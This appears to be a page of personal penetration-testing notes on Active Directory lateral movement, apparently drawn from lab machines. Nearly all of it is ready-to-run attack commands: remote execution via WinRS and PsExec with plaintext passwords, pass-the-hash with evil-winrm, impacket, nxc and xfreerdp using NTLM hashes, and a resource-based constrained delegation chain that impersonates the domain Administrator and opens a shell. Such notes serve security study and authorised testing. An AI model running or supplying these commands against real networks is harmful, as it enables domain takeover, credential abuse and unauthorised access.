Lateral Movement AD

Page not found - HackTricksbook.hacktricks.xyz

WADComswadcoms.github.io

WinRM

# WinRS
winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

PsExec

C:\Tools\SysinternalsSuite>hostname
client74

C:\Tools\SysinternalsSuite>.\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd
PsExec v2.4 - Execute processes remotely

C:\Windows\system32>hostname
FILES04

Pass the Hash

# winrm
nxc winrm resourced.local -u users.txt -H hashes.txt
evil-winrm -i resourced.local -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808'

# wmiexec
impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E [email protected]

# PsExec
impacket-psexec [email protected] -hashes :e728ecbadfb02f51ce8eed753f3ff3fd

# smb
nxc smb 10.10.14.14 -u user -H :e728ecbadfb02f51ce8eed753f3ff3fd --shares

# xfreerdp
xfreerdp /v:10.10.14.14 /u:user /d: /pth:e728ecbadfb02f51ce8eed753f3ff3fd

# mssql
impacket-mssqlclient -windows-auth -hashes :e728ecbadfb02f51ce8eed753f3ff3fd [email protected]

Overpass the Hash

Pass the Ticket

Persistence

impacket-addcomputer

# Add new computer
impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.179.175 -
hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'qais' -computer-pass 'qais'

# https://github.com/tothi/rbcd-attack/blob/master/rbcd.py
# Script to configure attribute ‘msDS-AllowedToActOnBehalfOfOtherIdentity’
python3 rbcd.py -dc-ip 192.168.179.175 -t RESOURCEDC -f 'qais' -
hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone

# Obtain a service ticket for the Administrator using SPN (Service Principal Name)
impacket-getST -spn cifs/resourcedc.resourced.local resourced/qais\$:'qais' -impersonate
Administrator -dc-ip 192.168.179.175

# Set the Kerberos credential cache as an environment variable
export KRB5CCNAME=./Administrator.ccache

# Connect using psexec with Kerberos auth
impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.179.175

PreviousAttacking AD NextShells

Last updated 1 year ago